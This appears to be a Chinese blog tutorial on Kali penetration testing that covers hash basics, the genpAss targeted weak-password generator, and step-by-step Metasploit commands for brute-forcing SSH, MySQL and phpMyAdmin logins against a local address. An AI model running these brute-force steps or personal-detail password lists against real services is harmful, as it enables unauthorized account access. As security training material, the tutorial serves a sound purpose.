• 渗透利器-kali工具 (第五章-3) Metasploit密码爆破模块


    本文内容:

    • 常见的加密方式
    • 密码生成工具
    • 查找爆破模块
    • 实战密码爆破

    使用MSF的爆破模块进行进一步"信息收集"。

    1,常见的加密方式:

      1.MD5加密:
        常用的密码验证算法,用于操作系统登录认证。

        例如:49ba59abbe56e057 [123456]

        明文密码:

          存在规律性

          可破解性

          对应性[撞库]

        密文:

          使用加密算法

          唯一性

          不可伪造性

          不可逆性

        常见的hash加密:

          https://www.jianshu.com/p/0d53b9b5631e

          https://cmd5.com/

        在线工具箱:

          https://tool.bugku.com/

      2.验证hash值:

        Windows自带工具验证hash值:

          certutil /?             查看帮助

          certutil -hashfile 1.jpg MD5   查看文件MD5值

        作用:

          1.验证文件是否损坏

          2.验证文件是否被修改[后门]

        案例:

          https://www.freebuf.com/articles/paper/147403.html (新闻)

          https://www.qianxin.com/other/CVE-2019-0708

    2,密码生成工具-genpAss:

      中国特色的弱口令生成器:

      指令:

        -n    命令

        -u    用户名

        -q    QQ号

        -e    邮箱

        -m     手机号

        -b    生日:格式:2001-01-01 

        -c    公司名

        -o    导出文件

      下载地址:https://github.com/RicterZ/genpAss

      安全趣闻:https://www.freebuf.com/sectool/197414.html

      案例:http://www.anquan.us/static/bugs/wooyun-2016-0197071.html

      密码泄露查询:https://haveibeenpwned.com/Passwords 

    3,查找 爆破模块:

      查找爆破模块的姿势:

        查找关键字:login  [search type:auxiliary login]

      通过搜索功能快速找到我们想要的模块,缩小范围、精确定位。

        查找服务名:search type:auxiliary name:ssh

        查找服务名+关键字:search type:auxiliary name:phpmyadmin login

    4,实战密码爆破:

      通过"信息收集"进行针对性的密码爆破

      1.SSH密码爆破:

        使用模块名:auxiliary/scanner/ssh/ssh_login

        1.查找模块: search type:auxiliary name:ssh

        2.使用模块: use auxiliary/scanner/ssh/ssh_login

        3.查看需设置选项:options   [pass_file,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]

        4.设置目标地址:set rhosts 地址[127.0.0.1] 

        5.设置用户名:set username root

        6.设置字典:set pass_file /root/桌面/1.txt  [文件路径+文件名称]

        7.开始爆破:run

      2.MySQL密码爆破:[显示详细结果]

        使用模块名:auxiliary/scanner/mysql/mysql_login

        1.查找模块:search type:auxiliary name:mysql

        2.使用模块:use auxiliary/scanner/mysql/mysql_login

        3.查看设置选项:options  [pass_file,rport,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]

        4.设置目标地址:set rhosts 地址 [127.0.0.1]

        5.设置用户名:set username root

        6.设置密码字典:set pass_file /root/桌面/1.txt  [文件路径+文件名称]

        7.开始爆破:run

      3.phpadmin登录验证爆破:[显示详细结果]

        使用模块名:auxiliary/scanner/http/phpmyadmin_login

        1.查找模块:search type:auxiliary name:phpmyadmin

        2.使用模块:use auxiliary/scanner/http/phpmyadmin_login

        3.查看设置选项:options  [pass_file,rport,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]

        4.设置目标地址:set rhosts 地址[127.0.0.1]

        5.设置端口号:set rport 端口[8080]

        6.设置目标范围:set targeturl phpAdmin/index.php

        7.设置用户名:set username root

        8.设置密码字典:set pass_file /root/桌面/1.txt

        9.开始爆破:run

             

  • 相关阅读:
    加油站
    UIScrollView控件实现图片轮播
    键值编码 KVC
    键值观察 KVO
    弹出视图集合
    关于Page翻页效果, PageViewConrtoller
    Event Handling Guide for iOS--事件驱动指南
    远程控制
    耳机线控
    ASI框架的使用
  • 原文地址:https://www.cnblogs.com/xz25/p/12917867.html
Copyright © 2020-2023  润新知